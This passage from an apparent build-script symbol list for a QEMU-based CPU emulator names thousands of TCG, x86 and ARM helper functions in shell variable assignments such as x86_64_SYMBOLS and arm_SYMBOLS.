helper_atomic_fetch_sminw_be \ helper_atomic_fetch_uminw_be \ helper_atomic_fetch_smaxw_be \ helper_atomic_fetch_umaxw_be \ helper_atomic_smin_fetchw_be \ helper_atomic_umin_fetchw_be \ helper_atomic_smax_fetchw_be \ helper_atomic_umax_fetchw_be \ helper_atomic_fetch_addw_be \ helper_atomic_add_fetchw_be \ helper_atomic_cmpxchgl_le \ helper_atomic_xchgl_le \ helper_atomic_fetch_addl_le \ helper_atomic_fetch_andl_le \ helper_atomic_fetch_orl_le \ helper_atomic_fetch_xorl_le \ helper_atomic_add_fetchl_le \ helper_atomic_and_fetchl_le \ 
helper_atomic_or_fetchl_le \ helper_atomic_xor_fetchl_le \ helper_atomic_fetch_sminl_le \ helper_atomic_fetch_uminl_le \ helper_atomic_fetch_smaxl_le \ helper_atomic_fetch_umaxl_le \ helper_atomic_smin_fetchl_le \ helper_atomic_umin_fetchl_le \ helper_atomic_smax_fetchl_le \ helper_atomic_umax_fetchl_le \ helper_atomic_cmpxchgl_be \ helper_atomic_xchgl_be \ helper_atomic_fetch_andl_be \ helper_atomic_fetch_orl_be \ helper_atomic_fetch_xorl_be \ helper_atomic_and_fetchl_be \ helper_atomic_or_fetchl_be \ helper_atomic_xor_fetchl_be \ helper_atomic_fetch_sminl_be \ helper_atomic_fetch_uminl_be \ helper_atomic_fetch_smaxl_be \ helper_atomic_fetch_umaxl_be \ helper_atomic_smin_fetchl_be \ helper_atomic_umin_fetchl_be \ helper_atomic_smax_fetchl_be \ helper_atomic_umax_fetchl_be \ helper_atomic_fetch_addl_be \ helper_atomic_add_fetchl_be \ helper_atomic_cmpxchgq_le \ helper_atomic_xchgq_le \ helper_atomic_fetch_addq_le \ helper_atomic_fetch_andq_le \ helper_atomic_fetch_orq_le \ helper_atomic_fetch_xorq_le \ helper_atomic_add_fetchq_le \ helper_atomic_and_fetchq_le \ helper_atomic_or_fetchq_le \ helper_atomic_xor_fetchq_le \ helper_atomic_fetch_sminq_le \ helper_atomic_fetch_uminq_le \ helper_atomic_fetch_smaxq_le \ helper_atomic_fetch_umaxq_le \ helper_atomic_smin_fetchq_le \ helper_atomic_umin_fetchq_le \ helper_atomic_smax_fetchq_le \ helper_atomic_umax_fetchq_le \ helper_atomic_cmpxchgq_be \ helper_atomic_xchgq_be \ helper_atomic_fetch_andq_be \ helper_atomic_fetch_orq_be \ helper_atomic_fetch_xorq_be \ helper_atomic_and_fetchq_be \ helper_atomic_or_fetchq_be \ helper_atomic_xor_fetchq_be \ helper_atomic_fetch_sminq_be \ helper_atomic_fetch_uminq_be \ helper_atomic_fetch_smaxq_be \ helper_atomic_fetch_umaxq_be \ helper_atomic_smin_fetchq_be \ helper_atomic_umin_fetchq_be \ helper_atomic_smax_fetchq_be \ helper_atomic_umax_fetchq_be \ helper_atomic_fetch_addq_be \ helper_atomic_add_fetchq_be \ cpu_ldub_code \ cpu_lduw_code \ cpu_ldl_code \ cpu_ldq_code \ helper_div_i32 \ helper_rem_i32 \ helper_divu_i32 \ helper_remu_i32 \ helper_shl_i64 \ helper_shr_i64 \ helper_sar_i64 \ helper_div_i64 \ helper_rem_i64 \ helper_divu_i64 \ helper_remu_i64 \ helper_muluh_i64 \ helper_mulsh_i64 \ helper_clz_i32 \ helper_ctz_i32 \ helper_clz_i64 \ helper_ctz_i64 \ helper_clrsb_i32 \ helper_clrsb_i64 \ helper_ctpop_i32 \ helper_ctpop_i64 \ helper_lookup_tb_ptr \ helper_exit_atomic \ helper_gvec_add8 \ helper_gvec_add16 \ helper_gvec_add32 \ helper_gvec_add64 \ helper_gvec_adds8 \ helper_gvec_adds16 \ helper_gvec_adds32 \ helper_gvec_adds64 \ helper_gvec_sub8 \ helper_gvec_sub16 \ helper_gvec_sub32 \ helper_gvec_sub64 \ helper_gvec_subs8 \ helper_gvec_subs16 \ helper_gvec_subs32 \ helper_gvec_subs64 \ helper_gvec_mul8 \ helper_gvec_mul16 \ helper_gvec_mul32 \ helper_gvec_mul64 \ helper_gvec_muls8 \ helper_gvec_muls16 \ helper_gvec_muls32 \ helper_gvec_muls64 \ helper_gvec_neg8 \ helper_gvec_neg16 \ helper_gvec_neg32 \ helper_gvec_neg64 \ helper_gvec_abs8 \ helper_gvec_abs16 \ helper_gvec_abs32 \ helper_gvec_abs64 \ helper_gvec_mov \ helper_gvec_dup64 \ helper_gvec_dup32 \ helper_gvec_dup16 \ helper_gvec_dup8 \ helper_gvec_not \ helper_gvec_and \ helper_gvec_or \ helper_gvec_xor \ helper_gvec_andc \ helper_gvec_orc \ helper_gvec_nand \ helper_gvec_nor \ helper_gvec_eqv \ helper_gvec_ands \ helper_gvec_xors \ helper_gvec_ors \ helper_gvec_shl8i \ helper_gvec_shl16i \ helper_gvec_shl32i \ helper_gvec_shl64i \ helper_gvec_shr8i \ helper_gvec_shr16i \ helper_gvec_shr32i \ helper_gvec_shr64i \ helper_gvec_sar8i \ 
helper_gvec_sar16i \ helper_gvec_sar32i \ helper_gvec_sar64i \ helper_gvec_shl8v \ helper_gvec_shl16v \ helper_gvec_shl32v \ helper_gvec_shl64v \ helper_gvec_shr8v \ helper_gvec_shr16v \ helper_gvec_shr32v \ helper_gvec_shr64v \ helper_gvec_sar8v \ helper_gvec_sar16v \ helper_gvec_sar32v \ helper_gvec_sar64v \ helper_gvec_eq8 \ helper_gvec_ne8 \ helper_gvec_lt8 \ helper_gvec_le8 \ helper_gvec_ltu8 \ helper_gvec_leu8 \ helper_gvec_eq16 \ helper_gvec_ne16 \ helper_gvec_lt16 \ helper_gvec_le16 \ helper_gvec_ltu16 \ helper_gvec_leu16 \ helper_gvec_eq32 \ helper_gvec_ne32 \ helper_gvec_lt32 \ helper_gvec_le32 \ helper_gvec_ltu32 \ helper_gvec_leu32 \ helper_gvec_eq64 \ helper_gvec_ne64 \ helper_gvec_lt64 \ helper_gvec_le64 \ helper_gvec_ltu64 \ helper_gvec_leu64 \ helper_gvec_ssadd8 \ helper_gvec_ssadd16 \ helper_gvec_ssadd32 \ helper_gvec_ssadd64 \ helper_gvec_sssub8 \ helper_gvec_sssub16 \ helper_gvec_sssub32 \ helper_gvec_sssub64 \ helper_gvec_usadd8 \ helper_gvec_usadd16 \ helper_gvec_usadd32 \ helper_gvec_usadd64 \ helper_gvec_ussub8 \ helper_gvec_ussub16 \ helper_gvec_ussub32 \ helper_gvec_ussub64 \ helper_gvec_smin8 \ helper_gvec_smin16 \ helper_gvec_smin32 \ helper_gvec_smin64 \ helper_gvec_smax8 \ helper_gvec_smax16 \ helper_gvec_smax32 \ helper_gvec_smax64 \ helper_gvec_umin8 \ helper_gvec_umin16 \ helper_gvec_umin32 \ helper_gvec_umin64 \ helper_gvec_umax8 \ helper_gvec_umax16 \ helper_gvec_umax32 \ helper_gvec_umax64 \ helper_gvec_bitsel \ cpu_restore_state \ page_collection_lock \ page_collection_unlock \ free_code_gen_buffer \ tcg_exec_init \ tb_cleanup \ tb_flush \ tb_phys_invalidate \ tb_gen_code \ tb_exec_lock \ tb_exec_unlock \ tb_invalidate_phys_page_range \ tb_invalidate_phys_range \ tb_invalidate_phys_page_fast \ tb_check_watchpoint \ cpu_io_recompile \ tb_flush_jmp_cache \ tcg_flush_softmmu_tlb \ translator_loop_temp_check \ translator_loop \ helper_atomic_cmpxchgo_le_mmu \ helper_atomic_cmpxchgo_be_mmu \ helper_atomic_ldo_le_mmu \ helper_atomic_ldo_be_mmu \ helper_atomic_sto_le_mmu \ helper_atomic_sto_be_mmu \ unassigned_mem_ops \ floatx80_infinity \ dup_const_func \ gen_helper_raise_exception \ gen_helper_raise_interrupt \ gen_helper_vfp_get_fpscr \ gen_helper_vfp_set_fpscr \ gen_helper_cpsr_read \ gen_helper_cpsr_write \ tlb_reset_dirty_by_vaddr \ " x86_64_SYMBOLS=" cpu_get_tsc \ x86_cpu_get_memory_mapping \ cpu_x86_update_dr7 \ breakpoint_handler \ helper_single_step \ helper_rechecking_single_step \ helper_set_dr \ helper_get_dr \ helper_bpt_io \ helper_cc_compute_all \ cpu_cc_compute_all \ helper_cc_compute_c \ helper_write_eflags \ helper_read_eflags \ helper_clts \ helper_reset_rf \ helper_cli \ helper_sti \ helper_clac \ helper_stac \ get_register_name_32 \ host_cpuid \ host_vendor_fms \ x86_cpu_set_default_version \ cpu_clear_apic_feature \ cpu_x86_cpuid \ x86_cpu_pending_interrupt \ x86_update_hflags \ cpu_x86_init \ helper_raise_interrupt \ helper_raise_exception \ raise_interrupt \ raise_exception_err \ raise_exception_err_ra \ raise_exception \ raise_exception_ra \ x86_cpu_tlb_fill \ cpu_set_ignne \ helper_flds_FT0 \ helper_fldl_FT0 \ helper_fildl_FT0 \ helper_flds_ST0 \ helper_fldl_ST0 \ helper_fildl_ST0 \ helper_fildll_ST0 \ helper_fsts_ST0 \ helper_fstl_ST0 \ helper_fist_ST0 \ helper_fistl_ST0 \ helper_fistll_ST0 \ helper_fistt_ST0 \ helper_fisttl_ST0 \ helper_fisttll_ST0 \ helper_fldt_ST0 \ helper_fstt_ST0 \ helper_fpush \ helper_fpop \ helper_fdecstp \ helper_fincstp \ helper_ffree_STN \ helper_fmov_ST0_FT0 \ helper_fmov_FT0_STN \ helper_fmov_ST0_STN \ 
helper_fmov_STN_ST0 \ helper_fxchg_ST0_STN \ helper_fcom_ST0_FT0 \ helper_fucom_ST0_FT0 \ helper_fcomi_ST0_FT0 \ helper_fucomi_ST0_FT0 \ helper_fadd_ST0_FT0 \ helper_fmul_ST0_FT0 \ helper_fsub_ST0_FT0 \ helper_fsubr_ST0_FT0 \ helper_fdiv_ST0_FT0 \ helper_fdivr_ST0_FT0 \ helper_fadd_STN_ST0 \ helper_fmul_STN_ST0 \ helper_fsub_STN_ST0 \ helper_fsubr_STN_ST0 \ helper_fdiv_STN_ST0 \ helper_fdivr_STN_ST0 \ helper_fchs_ST0 \ helper_fabs_ST0 \ helper_fld1_ST0 \ helper_fldl2t_ST0 \ helper_fldl2e_ST0 \ helper_fldpi_ST0 \ helper_fldlg2_ST0 \ helper_fldln2_ST0 \ helper_fldz_ST0 \ helper_fldz_FT0 \ helper_fnstsw \ helper_fnstcw \ update_fp_status \ helper_fldcw \ helper_fclex \ helper_fwait \ helper_fninit \ helper_fbld_ST0 \ helper_fbst_ST0 \ helper_f2xm1 \ helper_fyl2x \ helper_fptan \ helper_fpatan \ helper_fxtract \ helper_fprem1 \ helper_fprem \ helper_fyl2xp1 \ helper_fsqrt \ helper_fsincos \ helper_frndint \ helper_fscale \ helper_fsin \ helper_fcos \ helper_fxam_ST0 \ helper_fstenv \ helper_fldenv \ helper_fsave \ helper_frstor \ helper_fxsave \ helper_xsave \ helper_xsaveopt \ helper_fxrstor \ helper_xrstor \ helper_xgetbv \ helper_xsetbv \ update_mxcsr_status \ helper_ldmxcsr \ helper_enter_mmx \ helper_emms \ helper_movq \ helper_psrlw_mmx \ helper_psraw_mmx \ helper_psllw_mmx \ helper_psrld_mmx \ helper_psrad_mmx \ helper_pslld_mmx \ helper_psrlq_mmx \ helper_psllq_mmx \ helper_paddb_mmx \ helper_paddw_mmx \ helper_paddl_mmx \ helper_paddq_mmx \ helper_psubb_mmx \ helper_psubw_mmx \ helper_psubl_mmx \ helper_psubq_mmx \ helper_paddusb_mmx \ helper_paddsb_mmx \ helper_psubusb_mmx \ helper_psubsb_mmx \ helper_paddusw_mmx \ helper_paddsw_mmx \ helper_psubusw_mmx \ helper_psubsw_mmx \ helper_pminub_mmx \ helper_pmaxub_mmx \ helper_pminsw_mmx \ helper_pmaxsw_mmx \ helper_pand_mmx \ helper_pandn_mmx \ helper_por_mmx \ helper_pxor_mmx \ helper_pcmpgtb_mmx \ helper_pcmpgtw_mmx \ helper_pcmpgtl_mmx \ helper_pcmpeqb_mmx \ helper_pcmpeqw_mmx \ helper_pcmpeql_mmx \ helper_pmullw_mmx \ helper_pmulhrw_mmx \ helper_pmulhuw_mmx \ helper_pmulhw_mmx \ helper_pavgb_mmx \ helper_pavgw_mmx \ helper_pmuludq_mmx \ helper_pmaddwd_mmx \ helper_psadbw_mmx \ helper_maskmov_mmx \ helper_movl_mm_T0_mmx \ helper_movq_mm_T0_mmx \ helper_pshufw_mmx \ helper_pmovmskb_mmx \ helper_packsswb_mmx \ helper_packuswb_mmx \ helper_packssdw_mmx \ helper_punpcklbw_mmx \ helper_punpcklwd_mmx \ helper_punpckldq_mmx \ helper_punpckhbw_mmx \ helper_punpckhwd_mmx \ helper_punpckhdq_mmx \ helper_pi2fd \ helper_pi2fw \ helper_pf2id \ helper_pf2iw \ helper_pfacc \ helper_pfadd \ helper_pfcmpeq \ helper_pfcmpge \ helper_pfcmpgt \ helper_pfmax \ helper_pfmin \ helper_pfmul \ helper_pfnacc \ helper_pfpnacc \ helper_pfrcp \ helper_pfrsqrt \ helper_pfsub \ helper_pfsubr \ helper_pswapd \ helper_pshufb_mmx \ helper_phaddw_mmx \ helper_phaddd_mmx \ helper_phaddsw_mmx \ helper_pmaddubsw_mmx \ helper_phsubw_mmx \ helper_phsubd_mmx \ helper_phsubsw_mmx \ helper_pabsb_mmx \ helper_pabsw_mmx \ helper_pabsd_mmx \ helper_pmulhrsw_mmx \ helper_psignb_mmx \ helper_psignw_mmx \ helper_psignd_mmx \ helper_palignr_mmx \ helper_psrlw_xmm \ helper_psraw_xmm \ helper_psllw_xmm \ helper_psrld_xmm \ helper_psrad_xmm \ helper_pslld_xmm \ helper_psrlq_xmm \ helper_psllq_xmm \ helper_psrldq_xmm \ helper_pslldq_xmm \ helper_paddb_xmm \ helper_paddw_xmm \ helper_paddl_xmm \ helper_paddq_xmm \ helper_psubb_xmm \ helper_psubw_xmm \ helper_psubl_xmm \ helper_psubq_xmm \ helper_paddusb_xmm \ helper_paddsb_xmm \ helper_psubusb_xmm \ helper_psubsb_xmm \ helper_paddusw_xmm \ 
helper_paddsw_xmm \ helper_psubusw_xmm \ helper_psubsw_xmm \ helper_pminub_xmm \ helper_pmaxub_xmm \ helper_pminsw_xmm \ helper_pmaxsw_xmm \ helper_pand_xmm \ helper_pandn_xmm \ helper_por_xmm \ helper_pxor_xmm \ helper_pcmpgtb_xmm \ helper_pcmpgtw_xmm \ helper_pcmpgtl_xmm \ helper_pcmpeqb_xmm \ helper_pcmpeqw_xmm \ helper_pcmpeql_xmm \ helper_pmullw_xmm \ helper_pmulhuw_xmm \ helper_pmulhw_xmm \ helper_pavgb_xmm \ helper_pavgw_xmm \ helper_pmuludq_xmm \ helper_pmaddwd_xmm \ helper_psadbw_xmm \ helper_maskmov_xmm \ helper_movl_mm_T0_xmm \ helper_movq_mm_T0_xmm \ helper_shufps \ helper_shufpd \ helper_pshufd_xmm \ helper_pshuflw_xmm \ helper_pshufhw_xmm \ helper_addps \ helper_addss \ helper_addpd \ helper_addsd \ helper_subps \ helper_subss \ helper_subpd \ helper_subsd \ helper_mulps \ helper_mulss \ helper_mulpd \ helper_mulsd \ helper_divps \ helper_divss \ helper_divpd \ helper_divsd \ helper_minps \ helper_minss \ helper_minpd \ helper_minsd \ helper_maxps \ helper_maxss \ helper_maxpd \ helper_maxsd \ helper_sqrtps \ helper_sqrtss \ helper_sqrtpd \ helper_sqrtsd \ helper_cvtps2pd \ helper_cvtpd2ps \ helper_cvtss2sd \ helper_cvtsd2ss \ helper_cvtdq2ps \ helper_cvtdq2pd \ helper_cvtpi2ps \ helper_cvtpi2pd \ helper_cvtsi2ss \ helper_cvtsi2sd \ helper_cvtsq2ss \ helper_cvtsq2sd \ helper_cvtps2dq \ helper_cvtpd2dq \ helper_cvtps2pi \ helper_cvtpd2pi \ helper_cvtss2si \ helper_cvtsd2si \ helper_cvtss2sq \ helper_cvtsd2sq \ helper_cvttps2dq \ helper_cvttpd2dq \ helper_cvttps2pi \ helper_cvttpd2pi \ helper_cvttss2si \ helper_cvttsd2si \ helper_cvttss2sq \ helper_cvttsd2sq \ helper_rsqrtps \ helper_rsqrtss \ helper_rcpps \ helper_rcpss \ helper_extrq_r \ helper_extrq_i \ helper_insertq_r \ helper_insertq_i \ helper_haddps \ helper_haddpd \ helper_hsubps \ helper_hsubpd \ helper_addsubps \ helper_addsubpd \ helper_cmpeqps \ helper_cmpeqss \ helper_cmpeqpd \ helper_cmpeqsd \ helper_cmpltps \ helper_cmpltss \ helper_cmpltpd \ helper_cmpltsd \ helper_cmpleps \ helper_cmpless \ helper_cmplepd \ helper_cmplesd \ helper_cmpunordps \ helper_cmpunordss \ helper_cmpunordpd \ helper_cmpunordsd \ helper_cmpneqps \ helper_cmpneqss \ helper_cmpneqpd \ helper_cmpneqsd \ helper_cmpnltps \ helper_cmpnltss \ helper_cmpnltpd \ helper_cmpnltsd \ helper_cmpnleps \ helper_cmpnless \ helper_cmpnlepd \ helper_cmpnlesd \ helper_cmpordps \ helper_cmpordss \ helper_cmpordpd \ helper_cmpordsd \ helper_ucomiss \ helper_comiss \ helper_ucomisd \ helper_comisd \ helper_movmskps \ helper_movmskpd \ helper_pmovmskb_xmm \ helper_packsswb_xmm \ helper_packuswb_xmm \ helper_packssdw_xmm \ helper_punpcklbw_xmm \ helper_punpcklwd_xmm \ helper_punpckldq_xmm \ helper_punpcklqdq_xmm \ helper_punpckhbw_xmm \ helper_punpckhwd_xmm \ helper_punpckhdq_xmm \ helper_punpckhqdq_xmm \ helper_pshufb_xmm \ helper_phaddw_xmm \ helper_phaddd_xmm \ helper_phaddsw_xmm \ helper_pmaddubsw_xmm \ helper_phsubw_xmm \ helper_phsubd_xmm \ helper_phsubsw_xmm \ helper_pabsb_xmm \ helper_pabsw_xmm \ helper_pabsd_xmm \ helper_pmulhrsw_xmm \ helper_psignb_xmm \ helper_psignw_xmm \ helper_psignd_xmm \ helper_palignr_xmm \ helper_pblendvb_xmm \ helper_blendvps_xmm \ helper_blendvpd_xmm \ helper_ptest_xmm \ helper_pmovsxbw_xmm \ helper_pmovsxbd_xmm \ helper_pmovsxbq_xmm \ helper_pmovsxwd_xmm \ helper_pmovsxwq_xmm \ helper_pmovsxdq_xmm \ helper_pmovzxbw_xmm \ helper_pmovzxbd_xmm \ helper_pmovzxbq_xmm \ helper_pmovzxwd_xmm \ helper_pmovzxwq_xmm \ helper_pmovzxdq_xmm \ helper_pmuldq_xmm \ helper_pcmpeqq_xmm \ helper_packusdw_xmm \ helper_pminsb_xmm \ 
helper_pminsd_xmm \ helper_pminuw_xmm \ helper_pminud_xmm \ helper_pmaxsb_xmm \ helper_pmaxsd_xmm \ helper_pmaxuw_xmm \ helper_pmaxud_xmm \ helper_pmulld_xmm \ helper_phminposuw_xmm \ helper_roundps_xmm \ helper_roundpd_xmm \ helper_roundss_xmm \ helper_roundsd_xmm \ helper_blendps_xmm \ helper_blendpd_xmm \ helper_pblendw_xmm \ helper_dpps_xmm \ helper_dppd_xmm \ helper_mpsadbw_xmm \ helper_pcmpgtq_xmm \ helper_pcmpestri_xmm \ helper_pcmpestrm_xmm \ helper_pcmpistri_xmm \ helper_pcmpistrm_xmm \ helper_crc32 \ helper_pclmulqdq_xmm \ helper_aesdec_xmm \ helper_aesdeclast_xmm \ helper_aesenc_xmm \ helper_aesenclast_xmm \ helper_aesimc_xmm \ helper_aeskeygenassist_xmm \ cpu_sync_bndcs_hflags \ cpu_x86_support_mca_broadcast \ x86_cpu_set_a20 \ cpu_x86_update_cr0 \ cpu_x86_update_cr3 \ cpu_x86_update_cr4 \ x86_cpu_get_phys_page_attrs_debug \ cpu_x86_get_descr_debug \ do_cpu_init \ do_cpu_sipi \ x86_cpu_exec_enter \ x86_cpu_exec_exit \ x86_ldub_phys \ x86_lduw_phys \ x86_ldl_phys \ x86_ldq_phys \ x86_stb_phys \ x86_stl_phys_notdirty \ x86_stw_phys \ x86_stl_phys \ x86_stq_phys \ helper_divb_AL \ helper_idivb_AL \ helper_divw_AX \ helper_idivw_AX \ helper_divl_EAX \ helper_idivl_EAX \ helper_aam \ helper_aad \ helper_aaa \ helper_aas \ helper_daa \ helper_das \ helper_divq_EAX \ helper_idivq_EAX \ helper_pdep \ helper_pext \ helper_rclb \ helper_rcrb \ helper_rclw \ helper_rcrw \ helper_rcll \ helper_rcrl \ helper_rclq \ helper_rcrq \ helper_cr4_testbit \ helper_rdrand \ helper_cmpxchg8b_unlocked \ helper_cmpxchg8b \ helper_cmpxchg16b_unlocked \ helper_cmpxchg16b \ helper_boundw \ helper_boundl \ helper_outb \ helper_inb \ helper_outw \ helper_inw \ helper_outl \ helper_inl \ helper_into \ helper_cpuid \ helper_read_crN \ helper_write_crN \ helper_lmsw \ helper_invlpg \ helper_rdtsc \ helper_rdtscp \ helper_rdpmc \ helper_wrmsr \ helper_rdmsr \ helper_hlt \ helper_monitor \ helper_mwait \ helper_pause \ helper_debug \ helper_rdpkru \ helper_wrpkru \ helper_bndck \ helper_bndldx64 \ helper_bndldx32 \ helper_bndstx64 \ helper_bndstx32 \ helper_bnd_jmp \ helper_syscall \ helper_sysret \ x86_cpu_do_interrupt \ do_interrupt_x86_hardirq \ x86_cpu_exec_interrupt \ helper_lldt \ helper_ltr \ uc_check_cpu_x86_load_seg \ helper_load_seg \ helper_ljmp_protected \ helper_lcall_real \ helper_lcall_protected \ helper_iret_real \ helper_iret_protected \ helper_lret_protected \ helper_sysenter \ helper_sysexit \ helper_lsl \ helper_lar \ helper_verr \ helper_verw \ cpu_x86_load_seg \ helper_check_iob \ helper_check_iow \ helper_check_iol \ do_smm_enter \ helper_rsm \ helper_vmrun \ helper_vmmcall \ helper_vmload \ helper_vmsave \ helper_stgi \ helper_clgi \ helper_skinit \ helper_invlpga \ cpu_svm_check_intercept_param \ helper_svm_check_intercept_param \ helper_svm_check_io \ cpu_vmexit \ do_vmexit \ tcg_x86_init \ gen_intermediate_code \ restore_state_to_opc \ x86_cpu_xsave_all_areas \ x86_cpu_xrstor_all_areas \ cpu_get_fp80 \ cpu_set_fp80 \ " arm_SYMBOLS=" arm_cpu_exec_interrupt \ arm_cpu_update_virq \ arm_cpu_update_vfiq \ arm_cpu_initfn \ gt_cntfrq_period_ns \ arm_cpu_post_init \ arm_cpu_realizefn \ a15_l2ctlr_read \ arm_cpu_class_init \ cpu_arm_init \ helper_crypto_aese \ helper_crypto_aesmc \ helper_crypto_sha1_3reg \ helper_crypto_sha1h \ helper_crypto_sha1su1 \ helper_crypto_sha256h \ helper_crypto_sha256h2 \ helper_crypto_sha256su0 \ helper_crypto_sha256su1 \ helper_crypto_sha512h \ helper_crypto_sha512h2 \ helper_crypto_sha512su0 \ helper_crypto_sha512su1 \ helper_crypto_sm3partw1 \ 
helper_crypto_sm3partw2 \ helper_crypto_sm3tt \ helper_crypto_sm4e \ helper_crypto_sm4ekey \ helper_check_breakpoints \ arm_debug_check_watchpoint \ arm_debug_excp_handler \ arm_adjust_watchpoint_address \ read_raw_cp_reg \ pmu_init \ pmu_op_start \ pmu_op_finish \ pmu_pre_el_change \ pmu_post_el_change \ arm_pmu_timer_cb \ arm_gt_ptimer_cb \ arm_gt_vtimer_cb \ arm_gt_htimer_cb \ arm_gt_stimer_cb \ arm_gt_hvtimer_cb \ arm_hcr_el2_eff \ sve_exception_el \ sve_zcr_len_for_el \ hw_watchpoint_update \ hw_watchpoint_update_all \ hw_breakpoint_update \ hw_breakpoint_update_all \ register_cp_regs_for_features \ define_one_arm_cp_reg_with_opaque \ define_arm_cp_regs_with_opaque \ modify_arm_cp_regs \ get_arm_cp_reginfo \ arm_cp_write_ignore \ arm_cp_read_zero \ arm_cp_reset_ignore \ cpsr_read \ cpsr_write \ helper_sxtb16 \ helper_uxtb16 \ helper_sdiv \ helper_udiv \ helper_rbit \ arm_phys_excp_target_el \ aarch64_sync_32_to_64 \ aarch64_sync_64_to_32 \ arm_cpu_do_interrupt \ arm_sctlr \ arm_s1_regime_using_lpae_format \ aa64_va_parameters \ v8m_security_lookup \ pmsav8_mpu_lookup \ get_phys_addr \ arm_cpu_get_phys_page_attrs_debug \ helper_qadd16 \ helper_qadd8 \ helper_qsub16 \ helper_qsub8 \ helper_qsubaddx \ helper_qaddsubx \ helper_uqadd16 \ helper_uqadd8 \ helper_uqsub16 \ helper_uqsub8 \ helper_uqsubaddx \ helper_uqaddsubx \ helper_sadd16 \ helper_sadd8 \ helper_ssub16 \ helper_ssub8 \ helper_ssubaddx \ helper_saddsubx \ helper_uadd16 \ helper_uadd8 \ helper_usub16 \ helper_usub8 \ helper_usubaddx \ helper_uaddsubx \ helper_shadd16 \ helper_shadd8 \ helper_shsub16 \ helper_shsub8 \ helper_shsubaddx \ helper_shaddsubx \ helper_uhadd16 \ helper_uhadd8 \ helper_uhsub16 \ helper_uhsub8 \ helper_uhsubaddx \ helper_uhaddsubx \ helper_usad8 \ helper_sel_flags \ helper_crc32 \ helper_crc32c \ fp_exception_el \ arm_mmu_idx_to_el \ arm_mmu_idx_el \ arm_mmu_idx \ arm_stage1_mmu_idx \ arm_rebuild_hflags \ helper_rebuild_hflags_m32_newel \ helper_rebuild_hflags_m32 \ helper_rebuild_hflags_a32_newel \ helper_rebuild_hflags_a32 \ helper_rebuild_hflags_a64 \ cpu_get_tb_cpu_state \ helper_iwmmxt_maddsq \ helper_iwmmxt_madduq \ helper_iwmmxt_sadb \ helper_iwmmxt_sadw \ helper_iwmmxt_mulslw \ helper_iwmmxt_mulshw \ helper_iwmmxt_mululw \ helper_iwmmxt_muluhw \ helper_iwmmxt_macsw \ helper_iwmmxt_macuw \ helper_iwmmxt_unpacklb \ helper_iwmmxt_unpacklw \ helper_iwmmxt_unpackll \ helper_iwmmxt_unpacklub \ helper_iwmmxt_unpackluw \ helper_iwmmxt_unpacklul \ helper_iwmmxt_unpacklsb \ helper_iwmmxt_unpacklsw \ helper_iwmmxt_unpacklsl \ helper_iwmmxt_unpackhb \ helper_iwmmxt_unpackhw \ helper_iwmmxt_unpackhl \ helper_iwmmxt_unpackhub \ helper_iwmmxt_unpackhuw \ helper_iwmmxt_unpackhul \ helper_iwmmxt_unpackhsb \ helper_iwmmxt_unpackhsw \ helper_iwmmxt_unpackhsl \ helper_iwmmxt_cmpeqb \ helper_iwmmxt_cmpeqw \ helper_iwmmxt_cmpeql \ helper_iwmmxt_cmpgtsb \ helper_iwmmxt_cmpgtsw \ helper_iwmmxt_cmpgtsl \ helper_iwmmxt_cmpgtub \ helper_iwmmxt_cmpgtuw \ helper_iwmmxt_cmpgtul \ helper_iwmmxt_minsb \ helper_iwmmxt_minsw \ helper_iwmmxt_minsl \ helper_iwmmxt_minub \ helper_iwmmxt_minuw \ helper_iwmmxt_minul \ helper_iwmmxt_maxsb \ helper_iwmmxt_maxsw \ helper_iwmmxt_maxsl \ helper_iwmmxt_maxub \ helper_iwmmxt_maxuw \ helper_iwmmxt_maxul \ helper_iwmmxt_subnb \ helper_iwmmxt_subnw \ helper_iwmmxt_subnl \ helper_iwmmxt_addnb \ helper_iwmmxt_addnw \ helper_iwmmxt_addnl \ helper_iwmmxt_subub \ helper_iwmmxt_subuw \ helper_iwmmxt_subul \ helper_iwmmxt_addub \ helper_iwmmxt_adduw \ helper_iwmmxt_addul \ helper_iwmmxt_subsb \ 
helper_iwmmxt_subsw \ helper_iwmmxt_subsl \ helper_iwmmxt_addsb \ helper_iwmmxt_addsw \ helper_iwmmxt_addsl \ helper_iwmmxt_avgb0 \ helper_iwmmxt_avgb1 \ helper_iwmmxt_avgw0 \ helper_iwmmxt_avgw1 \ helper_iwmmxt_align \ helper_iwmmxt_insr \ helper_iwmmxt_setpsr_nz \ helper_iwmmxt_bcstb \ helper_iwmmxt_bcstw \ helper_iwmmxt_bcstl \ helper_iwmmxt_addcb \ helper_iwmmxt_addcw \ helper_iwmmxt_addcl \ helper_iwmmxt_msbb \ helper_iwmmxt_msbw \ helper_iwmmxt_msbl \ helper_iwmmxt_srlw \ helper_iwmmxt_srll \ helper_iwmmxt_srlq \ helper_iwmmxt_sllw \ helper_iwmmxt_slll \ helper_iwmmxt_sllq \ helper_iwmmxt_sraw \ helper_iwmmxt_sral \ helper_iwmmxt_sraq \ helper_iwmmxt_rorw \ helper_iwmmxt_rorl \ helper_iwmmxt_rorq \ helper_iwmmxt_shufh \ helper_iwmmxt_packuw \ helper_iwmmxt_packul \ helper_iwmmxt_packuq \ helper_iwmmxt_packsw \ helper_iwmmxt_packsl \ helper_iwmmxt_packsq \ helper_iwmmxt_muladdsl \ helper_iwmmxt_muladdsw \ helper_iwmmxt_muladdswl \ armv7m_nvic_set_pending \ helper_v7m_preserve_fp_state \ write_v7m_exception \ helper_v7m_bxns \ helper_v7m_blxns \ armv7m_nvic_neg_prio_requested \ helper_v7m_vlstm \ helper_v7m_vlldm \ arm_v7m_cpu_do_interrupt \ helper_v7m_mrs \ helper_v7m_msr \ helper_v7m_tt \ arm_v7m_mmu_idx_all \ arm_v7m_mmu_idx_for_secstate_and_priv \ arm_v7m_mmu_idx_for_secstate \ helper_neon_qadd_u8 \ helper_neon_qadd_u16 \ helper_neon_qadd_u32 \ helper_neon_qadd_u64 \ helper_neon_qadd_s8 \ helper_neon_qadd_s16 \ helper_neon_qadd_s32 \ helper_neon_qadd_s64 \ helper_neon_uqadd_s8 \ helper_neon_uqadd_s16 \ helper_neon_uqadd_s32 \ helper_neon_uqadd_s64 \ helper_neon_sqadd_u8 \ helper_neon_sqadd_u16 \ helper_neon_sqadd_u32 \ helper_neon_sqadd_u64 \ helper_neon_qsub_u8 \ helper_neon_qsub_u16 \ helper_neon_qsub_u32 \ helper_neon_qsub_u64 \ helper_neon_qsub_s8 \ helper_neon_qsub_s16 \ helper_neon_qsub_s32 \ helper_neon_qsub_s64 \ helper_neon_hadd_s8 \ helper_neon_hadd_u8 \ helper_neon_hadd_s16 \ helper_neon_hadd_u16 \ 